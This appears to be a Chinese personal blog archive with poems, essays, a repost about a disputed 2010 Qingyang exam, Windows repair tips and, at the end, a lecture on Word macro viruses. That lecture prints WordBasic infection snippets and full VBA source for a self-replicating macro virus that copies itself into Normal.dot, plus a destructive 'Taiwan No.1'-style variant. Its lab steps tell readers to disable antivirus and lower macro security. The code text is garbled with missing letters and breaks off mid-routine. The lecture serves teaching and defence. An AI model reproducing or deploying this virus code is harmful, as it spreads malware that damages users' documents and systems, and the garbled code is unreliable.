开朗,喜欢帮助别人。 月落乌啼霜满天,江枫渔火对愁眠!
( Fri, 18 Mar 2011 09:59:29 +0800 )
Description: 萧瑟的秋风轻轻的带走你清澈的眸子
落叶悠然的忘记曾经的归宿
云中层层的涟漪荡漾起生命的舞曲
临行的青鸟啊，停下你匆忙的脚步
带去我尘封已久的梦
寂寞的深渊，禁锢不了火红的誓言
遥远的天边有我心灵的灯塔
前行的道路依然坎坷
彷徨在漆黑的古道上，我们流离失所，
含血的相思之泪，带走我年少的痴狂
夜半的梦魇抹不去你迷离的身影
回首凝望，深深的足迹侵袭着脆弱的灵魂
夜、依旧宁静而冰凉
思绪纷乱不堪
拂过你白皙的面容
抹不去累累情丝的牵绊
芸芸众生中注定与你再续前缘
楼上的残灯下，淡淡的薄霜遮掩着你寂寞的身影
独眠的夜晚愿青月与你相伴
惘然的孤独点缀着临行的失落
迷茫的站在昏暗的灯光下
徘徊中追寻你逝去的香味
回味依稀的梦魇
寒鸦啼长空，凌轹已枉然
地角天涯，
情愿与君相伴
地久天长
浓情似水永难变
惜瞳前之欢
不吝今生永相依
冬去春来，带不走情丝的牵绊
相识相知本是前世未尽的尘缘
抛弃半生的流离，怎可知如此缠绕心间
饱经凌轹的路边，有你深深的惦念
红尘四合，烟云相连
莫若不相识，岂会度人间！
( Fri, 18 Mar 2011 09:54:42 +0800 )
Description: 太阳公公温和的将一丝丝光辉洒向大地，漫步在田间的小道上，倾听大自然的的天籁之音，路边的小草扭动着柔弱的身体，使劲的挤出地面，微风拂过，一缕缕清香撒向人间，不由的想起亲爱的故乡，自束发求学以来，已经有好多年没有走故乡的小道了，在我很小很小的时候，跟着亲爱的母亲，扛着锄头，耕耘在这片美丽的黄土地上，故乡的小道没有城市的喧哗，每每春天来临时，母亲总会带着我们姊妹去田间，小道曲曲折折，散发着泥土的清香，初春的嫩芽挺着笔直的腰杆在小道的上摇摆。幼小的心灵中，多么希望自己长大后也能像母亲一样，在这里种下来年的希望。
故乡的小道没有人刻意的去修，这正如鲁迅先生说的，其实这个世上本没有路，走的人多了，也便成了路，故乡的小道正是辛勤的父老乡亲走出来的，春天来时，这里开始长满新芽，有“鸟枕头”、“灰条子”、“胖娃娃”，成片的野草让路面变的温驯了很多，赤脚漫步在路上，软绵绵的，很舒服，春种的开始，乡亲们开始在土地上撒播种子，越来越多的脚印让这里变得纷繁起来，孩子们提着篮子，将一缕缕的青草拔掉，回家的时候，可以给馋嘴的小猪美食一顿，路面便开始变的光滑起来，一条白色的路面开始变的清晰，古典的架子车过后，两条深深的车辙留在路面上，好像城市的路肩一样，给人们的脚步划清界限，车辙的一边是人们播撒的希望，另一边是半人高的土坎，再次走上小道的时候，便不由的走在两道车辙的中央，但车辙的距离只能容纳一个人，所以两个人下地的时候，就默默的遵循着自然的规律，遵循着故乡的规矩，没有人愿意迈出这两道细细的车辙，即使说话的时候，也是一前一后的走着说，自小跟着母亲走这条熟悉的小道，一直跟在母亲的身后，幼小的心灵中，就把车辙当成不可逾越的界限。
麦苗经过冬寒的洗礼，昂首挺胸的站起来的时候，母亲带着我为嫩绿的庄稼拔草，木楼播种的庄稼成行的立在田间，像队伍一样等待人们的简约，成片的麦苗让整个村庄绿起来，站在山上看的时候，一片绿舟，这个时候，可以敞开心扉，倾听风声，清风拂过，麦苗开始翩翩起舞，似亭亭的舞女的裙，风声中蕴含着农民的喜悦，仿佛渺茫的歌声一样，荡漾起层层波浪，小道上的草儿也偷偷的长起来，又将路面变成绿色，碧绿的小道上偶尔一只兔子窜过，衬托着大自然的美，故土风情，让人流连忘返。
冬的来临，让大地一片苍茫，伴随着皑皑白雪，整个大地披上新装，显示着异样的美，岑参的一首诗，让游子的心久久回味，忽如一夜春风来，千树万树梨花开，再次走上小道，远处的树上，白色的雪球挂满枝头，中午的阳光穿过开满白花的树，在白色的天地上播撒着迷离的光点，天地一色，让人心旷神怡。走过小道，一步一个脚印，回头望时，留下串串足迹，又为大自然增加了活的气息。
凝神很久，忽然发现我该回家了，身在异乡多年，故乡的小道头一次这样清晰的出现在脑海中，念生命之悠悠，我们的生活还能走多久，乡风将故土的清香带到了这里，总是不停的为理想而奋斗，忽然发现，自己已经没有了理想，遥望面前的道路，一片苍茫，也许应该回头看看了。
( Tue, 1 Mar 2011 13:41:50 +0800 )
Description: 好久没有写过东西了，打开久违的博客，生活中的累累往事哗然眼前，暮然回首，人生已走过20余载，辛酸的求学道路上留下累累的伤痕，为光宗耀祖，为走出养育自己的贫瘠的故土，坎坎坷坷的走到今天，真正的面对世界的时候，发现一切都是枉然，碌碌无为的生活飘渺暗淡，无奈中开始羡慕辛勤耕耘在土地上的劳动人民，日出而作，日落而息，永远怀着无限的愿望憧憬美好的未来，每天拖着疲惫的身体返家的时候，看到一天来耕耘的收获，露出成功的喜悦。生命本该如此，虚名富贵又能延续多久。为了暗淡的虚名，为了在芸芸众生中能占到自己的空间，每天游荡在空虚的世界里，我为自己悲哀，彷徨在人生的道路上，我不知道自己应该怎么走，我不再是一个人，社会的纷繁打破了生命的狼藉，真正开始面对自己的时候，忽然发现自己已经不是单纯的自己，养育自己多年的父母早已两鬓白发，作为农民，他们纯朴的心中儿女们早已成龙成凤，耕耘黄土地一生，他们早已厌倦了繁重的体力劳动，觉得走出黄土地就是人生最大的幸福，我不禁想起田忠书先生的围城。人总是苍白的活着，平凡的人生充满着无穷无尽的等待，多少执着的成功人士，直到老去的那一天，也丝毫悟不出生命的真谛。在父母的心中，我们已经走上工作的岗位，自己再苦再累的活着，也充满着对生活的热衷，但我却在所谓父母们认为“成功”的光环下走的战战兢兢，想重回土地已经是梦想中的幻影，碌碌无为成为生命中悠闲的旋律。 面前的世界繁花似锦，个人主义，拜金主义已弥漫着整个生存的空间，偌大的空间，没有自己的一方净土，侧耳倾听窗外的风声，期间夹杂着社会的颓废，窗外嘈杂的人声陪衬着每个人忙碌的身影。独自一人漫步乡间，树杈中的嫩芽预报着新的一年已经开始，彷徨在人生的路上，我到底能走多久？
( Thu, 11 Nov 2010 09:54:51 +0800 )
Description:
庆阳市2010年招考安置成绩变更后，很多人对成绩的真实性产生了质疑，随组织游行示威活动，以下为现场图片。在QQ空间等相关网络博客中，以名为“庆阳市2010年就业考试戏剧性的玩笑。。。 ”的题目广泛流传，内容为
“ 庆阳市2010年10月31日招生考试，是隐藏的政府的黑暗，在现行国家《决定》出台的同时，各级政府却挂羊头卖狗肉，对毕业考生的学业的否定。对国家政策的公正，公开，透明的政策全然不顾，这就是现行的市级政府，是挂着促进就业的口号为自己的“第二代”敞开大门的政府，这还是我们学生的市政府吗？是为人民服务的政府吗？ 对于庆阳市2010年10月31日考试到11月10日之间，这场考试发生了多次戏剧性的变化，你会觉得很搞笑，很无奈。。。 第一：出题不合理，公共基础40道题，每题0.5分，行政能力测试60题，每题1分，申论70分。 第二：11月3日晚上成绩就出来了，网上可以看到，就是打不开，内部可以知道，外面的网上查不到。 第三：一直到5号，网上另公布网址，可是进入到里面，还是没有查询成绩的公告，一直是内部可以查，外面的考生通过网吧不能查询。 第四 ：到了7号晚上，才知道成绩出错，说另行公布。 第五；从9号到10号庆阳市政府的网站进不去。无法打开网站。
还有 第一：成绩出现小数点后面两位的情况，例如；77.20 78.95 82.98。 第二：成绩既然两次变动。 第三：内部知道，外面基本不知道。 第四：对于问题的解决居然说是号码机读码错误，那是谁提出要查卷子啊？为什么隔了这么久才查？？？？？” ( Wed, 6 May 2009 02:28:05 +0800 )
Description: 总喜欢深夜的宁静，电脑的风扇在金钱的驱动下默默的转着，哗哗的声音好似高山流水，似乎有一种大自然的愉悦，城市的夜没有月光，外面一片黑暗，静静的感受这片属于自己的天空。白天的一切琐碎事都死死的睡着了，空气中充满着解脱。 咔咔的键盘声敲打着寂寞的夜，一片祥和！窗外的冷风轻盈的踏进房间，盈盈的绕在身体的四周，诉说着阵阵的幽香。这个夜属于自己。血液缓缓的流动，从灵魂到指尖，传递到房子的每一个角落，温暖的持续着浪人的生命。 大学的时光在匆忙中度过，人生最美好的青春和时间留在这里，从来没有尝试着去辛勤的耕耘，直到离开的这一刻，竟然感觉不到丝毫的悔意，光阴似箭，真的，刚来的一个一无所知的小子已经变成了城府颇深的男人，想想来的那一刻，似乎就在眼前，忽然间来到一个美好的环境，步入城市的圈子，一次次的挫折失败，铸造了自己坚强的体魄，走出了自己的道路，似乎看起来很遥远的东西并不遥远，一刹那就走到了尽头，当走在遥远的路上暮然回首时，一切就象刚刚发生。生命只有在社会中才有价值，价值只有人才会说出来，当没有人的时候，即使再好，也不叫价值。时常呆在电脑前，帮网友解决困难，度化失落的年轻人，突然间觉得自己在一步步的远离社会，走的越远，知道的越少，而自己却觉得自己知道的是那么的多，慢慢的就进入了无法逾越的深谷，脱离了切实发生的现实。学校就是一堵墙，虽然其中也有人为名利而争斗，但在社会的脚步下，只是沧海之一粟，有时候想想自己是多么的无知，其实是一无所知！ 终于要走上职场，终于要走自己的人生，一幕幕的情景闪现在眼前，生活在社会的正面，我们都需要去做自己的本分，我们无法为自己的理想而努力，无法竭尽全力的去为自己的生活而奋斗，因为有家，因为养育于自己多年的父母。当陷入生命危机的时候，我才真正的发现，自己并不是在为自己活，当打算放手一搏的时候我退缩了，身后有太多的债还没有还，不应该去拼，只有沿着前人最光辉的道路走下去，可以填饱自己的肚子，可以慰藉养育多年的亲人，因为他们需要。 宁静的夜晚，深深的回头看着来时的道路，怎么来的，我还得怎么回去，命运是上帝给的，人无法做到逆天而行，因为想行也行不通。数一百遍的尝试，命运注定的只有失败，故作镇定的把它看成是上帝在磨练自己的意志，到底是不是，只有走到了路的尽头才能看清。典型一种人，整天的碌碌无为，却总是感觉到自己怀才不遇，心比天高，命比纸薄。我到底有才吗？仔细的探索自己的灵魂深处，其实自己也很一般，在任何成功人士的眼里，只是一个羽毛未丰的小娃娃。为自己的抱怨而愧疚。 拧紧生活的龙头，给自己新的起点，振作自己的精神，我们开始新的一轮挑战，为自己设计人生，为生活树立信心，不在为上帝而抱怨。我要好好的做人，继续为自己的人生而努力，哪怕结果一片狼藉，只能说，我努力了，无怨无悔的走我自己的路。
( Wed, 25 Feb 2009 17:17:34 +0800 )
Description: 总喜欢在黄昏时分听到悦耳的闹铃，城市里烦恼的气息得到暂时的安慰，习惯性的踏上黄河边的马路，聆听大自然的声音，日子伴随着一个个的黄昏悄然逝去，生命在闹铃的催动下一天天的步向终点，一切都在慢慢的结束。 黄河水面一片平静，一切都和我初来乍到时一模一样，二月的天气似寒非寒，静静的享受这片即将结束的热土，点点的记忆跃然眼前，思念故土的情怀油然而生，家乡的空气伴随着微风从遥远的天边轻轻的拂过，一片游子的归心牵动着每一丝清风，冰凉的空气缓缓的流入血液的深处。世界虽大，何处又是我的容身之处，思念远方的亲人，追梦依旧的情人！ 黄昏的闹铃敲响岁月的钟声，站在黄河边，遥望茫茫水面，似是无比的惬意，又仿佛惆怅万分。六年前的故人，难忘的梦，不知在何方？晚风吹动你的长发，带着遥远的梦来到我的身边，风中蕴含着你依稀的香味，人生无常，我在远方为你弹奏思念的琴弦。留给自己的思念是一杯温暖的红酒，轻轻的滑过嘴唇，一股甘露梦一般的倾入肺腑。叫醒遥远的追梦人！ 黄昏的铃声弹奏着生命的新开端，遥望没有星星的夜空，慢慢的进入一片漆黑，伸手不见五指的时候，畅想遥远的未来，回忆艰辛的过去，欢声笑语中告别美好的高中时代，累累的伤痕伴着岁月的陂陀进入新的天地，梦想中的大学生活一片乌烟瘴气，岁月撕咬着生命的旋律，一个痛苦的结束预示着新的开始。四年的大学生活依稀可见，思念的钟声无情的折磨着可悲的岁月，遥远的梦想拯救不了脆弱的灵魂。 黄昏的铃声敲打着颤抖的心，何处是我的容身之地，遥望漆黑的夜空，千丝万缕的小路出现在眼前，命运注定要不断的选择，灵魂注定被命运折磨，常言命运是上天的安排，呱呱坠地的那一刻，上帝已安排好了所有，可惜灵魂只能在黑夜中不断的挣扎，无尽的摸索。无论上帝安排的是否合理，只能默默的接受。渴望漆黑的夜空中滑过一道流星，替我带来上帝的音讯，却迟迟没有出现。 黄昏悄然逝去，借着昏暗的路灯一步步返回寝室。借着欢声笑语，忘记一切，开始新的梦乡。。。。。 ( Thu, 8 Jan 2009 12:50:21 +0800 )
Description:
网络分线器（网络三通），在通常情况下，我们用不到他，但在一定意义上，它相当于一个便宜而且便捷的集线器。下面，我介绍一下使用方法；
1号接口：如果是共享上网，这里作为网络进线接口，可以直接链接到路由器上。
2、3号接口：这两端可以各连接一台PC。
一、共享上网：首先我们知道集线器没有dhcp服务功能，通俗的说就是不能分配IP地址。如果我们的路由器内网地址是：192.168.1.1，那么PC机的网关就应该填成：192.168.1.1.对应的IP地址为：192.168.1.2---192.168.1.254。子网掩码为C类，255.255.255.0.
二、现在，我们还不能上网，大家都知道，我们的宽带路由器或者思科路由器有自己固定的输出带宽，也就是当我们联网后我们的本地连接显示的工作模式，宽带一般用的是100M /s，全双工的工作模式，但是我们接入了两台PC机后，PC的自动协商功能无法完成让两台PC机都工作，因为协商的时候，路由器或者交换机告诉PC“我是100M 的全双工工作模式”，但当两台PC都变成这种模式的话，事实上要求的速率是200M 了。所以只有自己设置自己的工作模式。 方法：右键“网上邻居\属性”再点“本地连接\属性”，然后点选项窗口的“配置\高级”，然后选择“连接速度工作模式”，也就是英文“link eed\duplex mode”,选择10M全双工，即“10M /full duplex”.然后点确定。当然，如果有50M全双工的更好。但是没有。而10M对于我们的ADSL2M的家庭宽带已经绰绰有余了。
分别在两台PC 机上完成上述工作后就可以上网了。
三、也可以用它实现双击互联，当然这只是在特殊情况下，一根用交叉线，另一根用直连线分别将两台PC连在2号和三号接口。这样，两台PC就可以相互通信，如果连接上1号接口的网络后，一台PC（用直连线）可以上网，而且可以访问另一台（交叉线）PC，而且可以上Internet。 ( Thu, 8 Jan 2009 10:35:22 +0800 )
Description: 一个普通的朋友从未看过你哭泣。一个真正的朋友有双肩让你的泪水湿尽。 一个普通的朋友不知道你父母的姓氏。一个真正的朋友有他们的***在通讯簿上。 一个普通的朋友会带瓶葡萄酒参加你的派对。一个真正的朋友会早点来帮你准备,为了帮你打扫而晚点走。 一个普通的朋友讨厌你在他睡了后打来***。一个真正的朋友会问为什么现在才打来。 一个普通的朋友找你谈论你的困扰。一个真正的朋友找你解决你的困扰。 一个普通的朋友对你的罗曼史感到好奇。一个真正的朋友可以威胁你说出来。 一个普通的朋友在来你家时，像一个客人一样。一个真正的朋友会打开冰箱自己拿东西。 一个普通的朋友在吵架后就认为友谊已经结束。一个真正的朋友明白当你们还没打过架就不叫真正的友谊。 一个普通的朋友期望你永远在他身边陪他。一个真正的朋友期望他能永远陪在你身旁 ！
( Sat, 19 Jul 2008 08:35:31 +0800 )
Description:
很多朋友都用过Windows系统提供的Regsvr32命令，你千万不要瞧不起这个小命令，有时候它能帮助你解决很多实际的问题，下面就是笔者平时使用中总结出来的几个技巧。
1. 修复IE浏览器
　　很多经常上网的朋友都有过这样的遭遇：IE不能打开新的窗口，用鼠标单击超链接也没有任何反应。这时重装IE一般能解决问题。其实不必这么麻烦，使用Regsvr32命令就可以轻松搞定。
　　具体的解决方法：依次选择“开始→运行”，在“运行”对话框中输入“regsvr32 actxprxy.dll”命令，单击“确定”按钮，这时会弹出一个信息对话框，提示“actxprxy.dll中的DllRegisterServer成功”，单击“确定”按钮，然后再在“运行”对话框中输入“regsvr32 shdocvw.dll”命令，单击“确定”按钮，重新启动计算机后IE就被修复了。
2. 解决Windows无法在线升级
　　Windows的漏洞很多，每隔一段时间就需要使用“Windows Update”进行在线升级，不过“Windows Update”经常出现无法使用的情况，这时，我们也可以使用Regsvr32来解决这个问题。
　　具体的解决方法：依次选择“开始→运行”，在“运行”对话框中输入“regsvr32 wupdinfo.dll”命令，单击“确定”按钮，这样在系统中就重新注册了“Windows Update”组件，重新启动计算机后问题即可解决。
3. 防范网络脚本病毒
　　网络脚本病毒嵌在网页中，上网时在不知不觉中机器就会感染上这种病毒。笔者认为单纯使用杀毒软件并不能有效地防范这些脚本病毒，必须从病毒传播的机理入手。网络脚本病毒的复制、传播都离不开FSO对象（File System Object，文件系统对象），因此禁用FSO对象就能有效地控制脚本病毒的传播。
　　具体的操作方法：依次选择“开始→运行”，在“运行”对话框中输入“regsvr32 /u scrrun.dll”命令即可禁用FSO对象；如果需要使用FSO对象，输入“regsvr32 scrrun.dll”命令即可。
( Tue, 1 Jul 2008 09:15:27 +0800 )
Description: 电脑中毒后，许多朋友会打开“进程管理器”，将几个不太熟悉的程序关闭掉，但有时会碰到这种情况：关掉一个，再去关闭另外一个时，刚才关闭的那个马上又运行了。再从注册表里先把启动项删除后，重启试试，刚删除的那些启动项又还原了。由于电脑只装一个操作系统，也没办法在另一个系统下删除这些病毒。上网下载专杀工具后，仍然不能杀掉。
　　如此翻来覆去，病毒未杀掉，人却濒临崩溃。这时怎么办呢?遇到这种情况，笔者向大家推荐一种方法。
　　第一步：在“开始→运行”中输入CMD，打开“命令提示符”窗口。
　　第二步：输入ftype exefile=notepad.exe %1，这句话的意思是将所有的EXE文件用“记事本”打开。这样原来的病毒就无法启动了。
　　第三步：重启电脑，你会看见打开了许多“记事本”。当然，这其中不仅有病毒文件，还有一些原来的系统文件，比如：输入法程序。
　　第四步：右击任何文件，选择“打开方式”，然后点击“浏览”，转到Windows\System32下，选择cmd.exe，这样就可以再次打开“命令提示符”窗口。
　　第五步：运行ftype exefile=%1 %*，将所有的EXE文件关联还原。现在运行杀毒软件或直接改回注册表，就可以杀掉病毒了。
　　第六步：在每一个“记事本”中，点击菜单中的“文件→另存为”，就可看到了路径以及文件名了。找到病毒文件，手动删除即可，但得小心，必须确定那是病毒才能删除。建议将这些文件改名并记下，重启后，如果没有病毒作怪，也没有系统问题，再进行删除，
：Ftype的用法
　　在Windows中，Ftype命令用来显示及修改不同扩展名文件所关联的打开程序。相当于在注册表编辑器中修改“HKEY_CLASSES_ROOT”项下的部分内容一样。
　　Ftype的基本使用格式为：Ftype [文件类型[=[打开方式/程序]]]
　　比如：像上例中的ftype exefile=notepad.exe %1，表示将所有文件类型为EXE(exefile表示为EXE类型文件)的文件都通过“记事本”程序打开，后面的%1表示要打开的程序本身(就是双击时的那个程序)。
　　ftype exefile=%1 %*则表示所有EXE文件本身直接运行(EXE 可以直接运行，所以用表示程序本身的%1即可)，后面的%*则表示程序命令后带的所有参数(这就是为什么EXE文件可以带参数运行的原因)。
( Fri, 13 Jun 2008 14:51:36 +0800 )
Description:
一、卧薪尝胆：狼不会为了所谓的尊严在自己弱小时攻击比自己强大的东西。
　　二、众狼一心：狼如果不得不面对比自己强大的东西，必群而攻之。
　　三、自知之明：狼也很想当兽王，但狼知道自己是狼不是老虎。
　　四、顺水行舟：狼知道如何用最小的代价，换取最大的回报。
　　五、同进同退：狼虽然通常独自活动，但狼却是最团结的动物，你不会发现有哪只狼在同伴受伤时独自逃走。
　　六、表里如一：狼也很想当一个善良的动物，但狼也知道自己的胃只能消化肉，所以狼唯一能做的只有干干净净的吃掉每次猎物，而某些自认为是善良的动物却总在酒店饭庄里做一些不是“太善良”的事。
　　七、知己知彼：狼尊重每个对手，狼在每次攻击前都会去了解对手，而不会轻视它，所以狼一生的攻击很少失误。
　　八、狼亦钟情：公狼会在母狼怀孕后，一直保护母狼，直到小狼有独立能力。而不像某些自诩为“唯一有感情”的动物，在妻子怀孕后，在外花天酒地。所以狼很不满人把那些不钟情的人称之为狼心狗肺！因为这不公平！！
　　九、授狼以渔：狼会在小狼有独立能力的时候坚决离开它，因为狼知道，如果当不成狼，就只能当羊了。
　　十、自由可贵：狼不会为了嗟来之食而不顾尊严的向主人摇头晃尾。因为狼知道，决不可有傲气，但不可无傲骨，所以狼有时也会独自哼哼自由歌 ( Thu, 8 May 2008 20:38:31 +0800 )
Description: 宏病毒
学习目标
&8226 掌握宏病毒概念
&8226 掌握宏病毒制作机制
&8226 了解宏病毒实例
&8226 掌握宏病毒防范方法
&8226 掌握宏病毒实验
宏病毒定义
&8226 宏病毒是利用系统的开放性专门制作的一个或多个具有病毒特点的宏的集合，这种病毒宏的集合影响到计算机的使用，并能通过文档及模板进行自我复制及传播。
支持宏病毒的应用系统特点
&8226 要达到宏病毒传染的目的，系统须具备以下特性：
– 可以把特定的宏命令代码附加在指定文件上；
– 可以实现宏命令在不同文件之间的共享和传递； – 可以在未经使用者许可的情况下获取某种控制权。
可支持宏病毒的应用系统
&8226 Microsoft公司的WORD、EXCEL、Acce 、PowerPoint、Project、Visio等产品；
&8226 I rise公司的Lotus AmiPro字处理软件；
&8226 此外，还包括AutoCAD、Corel Draw、PDF等等。
宏病毒的特点
&8226 传播极快
&8226 制作、变种方便
&8226 破坏可能性极大
&8226 多平台交叉感染
&8226 地域性问题
宏病毒的共性
&8226 宏病毒会感染DOC文档文件和DOT模板文件。
&8226 打开时激活，通过Normal模板传播。
&8226 通过AutoOpen，AutoClose，AutoNew和AutoExit等自动宏获得控制权。
&8226 病毒宏中必然含有对文档读写操作的宏指令。
宏病毒的作用机制
&8226 模板在建立整个文档中所起的作用是作为一个基类。新文档继承模板的属性（包括宏、菜单、格式等）。
&8226 编制宏病毒要用到的宏如右表 &8226 Word宏病毒感染过程
&8226 编制语言VBA\WordBasic等
&8226 环境：VBE
经典宏病毒-美丽莎 Meli a
&8226 这个病毒专门针对微软的电子邮件服务器MS Exchange和电子邮件收发软件Outlook Expre ，是一种Word宏病毒，利用微软的Word宏和Outlook Expre 发送载有80个***文学网址的列表，它可感染Word 97或Word 2000。当用户打开一个受到感染的Word 97或Word 2000文件时，病毒会自动通过被感染者的MS Exchange 和Outlook Expre 的通讯录，给前50个地址发出带有W97M_MELISSA病毒的电子邮件。 &8226 如果某个用户的电子信箱感染了“美丽杀手”病毒，那么，在他的信箱中将可以看到标题为“Important me age from XX(来自XX的重要信息)”的邮件，其中XX是发件人的名字。正文中写道，“这是你索要的文件……不要给其他人看;－)。”此外，该邮件还包括一个名为list.doc的Word文档附件，其中包含大量的***网址。
经典宏病毒-台湾NO.1B
&8226 病毒发作时，只要打开一个Word文档，就会被要求计算一道5个至多4位数的连乘算式。由于算式的复杂度，很难在短时间内计算出***，一旦计算错误，Word就会自动开启20个新窗口，然后再次生成一道类似的算式，接着不断往复，直至系统资源耗尽。
经典宏病毒-O97M.Tristate.C病毒
&8226 O97M.Tristate.C宏病毒可以交叉感染MS Word 97、MS Excwel 97和MS PowerPoint 97等多种程序生成的数据文件。病毒从Word文档、Excel电子表格或PowerPoint幻灯片被激活，并进行交叉感染。病毒在Excel中被激活时，它在Excel Startup目录下查找文档BOOK1.XLS，如果不存在，病毒将在该目录下创建一个被感染的工作簿并使Excel的宏病毒保护功能失效。病毒存放在被感染的电子表格的“ThisWorkbook”中。
宏语言 &8226 使用VBA可以实现的功能包括：
– （1 ）使重复的任务自动化
– （2 ）自定义Word 工具栏、菜单和界面
– （3 ）简化模板的使用
– （4 ）自定义Word ，使其成为开发平台
宏病毒关键技术
&8226 （1）自动执行的示例代码：
– Sub MAIN
– On Error Goto Abort
– iMacroCount = CountMacros(0, 0)
– ' 检查是否感染该文档文件
– For i = 1 To iMacroCount
– If MacroName$(i, 0, 0) = "PayLoad" Then
– bI talled = - 1 – '检查正常的宏
– End If
– If MacroName$(i, 0, 0) = "FileSaveAs" Then
– bTooMuchTrouble = - 1
– '但如果FILES***EAS 宏存在那么传染比较困难.
– End If
– Next i
– If Not bI talled And Not bTooMuchTrouble Then – '加入FileSaveAs 和拷贝到AutoExec and FileSaveAs.
– '有效代码不检查是否感染.
– '把代码加密使不可读.
– iWW6II tance = Val(GetDocumentVar$("WW6Infector"))
– sMe$ = FileName$()
– Macro$ = sMe$ + ":PayLoad"
– MacroCopy Macro$, "Global:PayLoad", 1
– Macro$ = sMe$ + ":FileOpen"
– MacroCopy Macro$, "Global:FileOpen", 1
– Macro$ = sMe$ + ":FileSaveAs"
– MacroCopy Macro$, "Global:FileSaveAs", 1
– Macro$ = sMe$ + ":AutoExec"
– MacroCopy Macro$, "Global:AutoExec", 1
– SetProfileString "WW6I", Str$(iWW6II tance + 1)
– End If
– Abort:
– End Sub &8226 （2） SaveAs 程序：
– 这是一个当使用FILE/S***E AS 功能时，拷贝宏病毒到活动文本的程序。它使用了许多类似于AutoExec 程序的技巧。尽管示例代码短小，但足以制作一个小巧的宏病毒。
– Sub MAIN
– Dim dlg As FileSaveAs
– GetCurValues dlg
– Dialog dlg – If (Dlg.Format = 0) Or (dlg.Format = 1) Then
– MacroCopy "FileSaveAs", WindowName$() + ":FileSaveAs"
– MacroCopy "FileSave ", WindowName$() + ":FileSave"
– MacroCopy "PayLoad", WindowName$() + ":PayLoad"
– MacroCopy "FileOpen", WindowName$() + ":FileOpen"
– Dlg.Format = 1
– End If
– FileDaveAs dlg
– End Su &8226 （3） 特殊代码：
– 还有些方法可以用来隐藏和使你的宏病毒更有趣。当有些人使用TOOLS/MICRO菜单观察宏时，该代码可以达到掩饰病毒的目的。
– Sub MAIN
– On Error Goto ErrorRoutine
– OldName$ = NomFichier$()
– If macros.bDebug Then
– MsgBox "start ToolsMacro"
– Dim dlg As OutilsMacro
– If macros.bDebug Then MsgBox "1"
– GetCurValues dlg
– If macros.bDebug Then MsgBox "2"
– On Error Goto Skip
– Dialog dlg
– OutilsMacro dlg – Skip:
– On Error Goto ErrorRoutine
– End If
– REM enable automacros
– DisableAutoMacros 0
– macros.SaveToGlobal(OldName$)
– macros.objective
– Goto Done – ErrorRoutine:
– On Error Goto Done
– If macros.bDebug Then
– MsgBox "error " + Str$(Err) + " occurred"
– End If – Done:
– End Sub
Word宏病毒发现方法
&8226 在Normal模板发现有AutoOpen等自动宏，FileSave等标准宏或一些怪名字的宏，而自己又没有加载特殊模板，这就有可能有病毒了。
&8226 当打开一个文档时，未经任何改动，立即就有存盘操作
&8226 打开以DOC为后缀的文件在另存菜单中只能以模板方式存盘
&8226 无法使用“另存为（Save As）”修改路径
&8226 不能再被转存为其它格式的文件
&8226 DOC文件具备与DOT文档相一致的内部格式(尽管文件扩展名未改变)。
手工清除宏病毒的方法 &8226 1．打开宏菜单，在通用模板中删除您认为是病毒的宏。 &8226 2．打开带有病毒宏的文档（模板），然后打开宏菜单，在通用模板和病毒文件名模板中删除您认为是病毒的宏。 &8226 3．保存清洁文档。
预防宏病毒
&8226 对于已染毒的模板文件（Normal.dot），应先其中的自动宏清除（AutoOpen、AutoClose、AutoNew），然后将其置成只读方式。
&8226 对于其他已染毒的文件均应将自动宏清除，这样就可以达到清除病毒的目的。
&8226 平时使用时要加强预防。对来历不明的宏最好删除。
&8226 先禁止所有自动执行的宏。
&8226 ***反病毒软件。 Word宏病毒实验
&8226 【实验目的】
– 演示宏的编写
– 说明宏的原理及其安全漏洞和缺陷
– 理解宏病毒的作用机制
&8226 【 实验平台】
– Windows 系列操作系统
– Word 2003 应用程序 &8226 【实验步骤】
– 软件设置：关闭杀毒软件的自动防护功能。
– 打开Word 2003 ，在工具à 宏à 安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有***的加载项和模板，选择信任visual basic 项目的访问。 &8226 实验一：自我复制功能演示。
&8226 打开一个word文档，然后按Alt+F11调用宏编写窗口（工具à宏àVisual Basicà宏编辑器），在左侧的project—Microsoft Word对象àThisDocument中输入源代码：
'Micro-Virus
Sub Document_Open()
On Error Resume Next
A lication.Di layStatusBar = False
Optio .SaveNormalPrompt = False
Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule
If ThisDocument = NormalTemplate Then Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
With Host If .Lines(1.1) "'Micro-Virus" Then .DeleteLines 1, .CountOfLines .I ertLines 1, Ourcode .ReplaceLine 2, "Sub Document_Close()" If ThisDocument = nomaltemplate Then .ReplaceLine 2, "Sub Document_Open()" ActiveDocument.SaveAs ActiveDocument.FullName End If End If
End With
MsgBox "MicroVirus by Content Security Lab"
End Sub
保存。此时当前word文档就含有宏病毒，只要下次打开这个word文档，就会执行以上代码，并将自身复制到Normal.dot（word文档的公共模板）和当前文档的ThisDocument中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open）。此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。 &8226 实验二：类台湾1号病毒实验
&8226 对实验一的恶意代码稍加修改，使其具有一定的破坏性（这里以著名宏病毒“台湾1号”的恶意代码部分为基础，为使其在word2003版本中运行，且降低破坏性，对源代码作适当修改）。实验二的源码：
'moonlight
Dim nm(4)
Sub Document_Open()
'DisableI ut 1
Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule
Set host = NormalTemplate.VBProject.VBComponents(1).CodeModule
If ThisDocument = NormalTemplate Then Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule
With host
If .Lines(1, 1) "'moonlight" Then .DeleteLines 1, .CountOfLines
.I ertLines 1, ourcodemodule.Lines(1, 100)
.ReplaceLine 3, "Sub Document_Close()" If ThisDocument = NormalTemplate Then .ReplaceLine 3, "Sub Document_Open()" ActiveDocument.SaveAs ActiveDocument.FullName End If End If
End With
Count = 0
If Day(Now()) = 1 Then
try: On Error GoTo try test = -1 con = 1 tog$ = "" i = 0 While test = -1 For i = 0 To 4 nm(i) = Int(Rnd() * 10) con = con * nm(i) If i = 4 Then tog$ = tog$ + Str$(nm(4)) + "=?" GoTo beg End If tog$ = tog$ + Str$(nm(i)) + "*" Next i
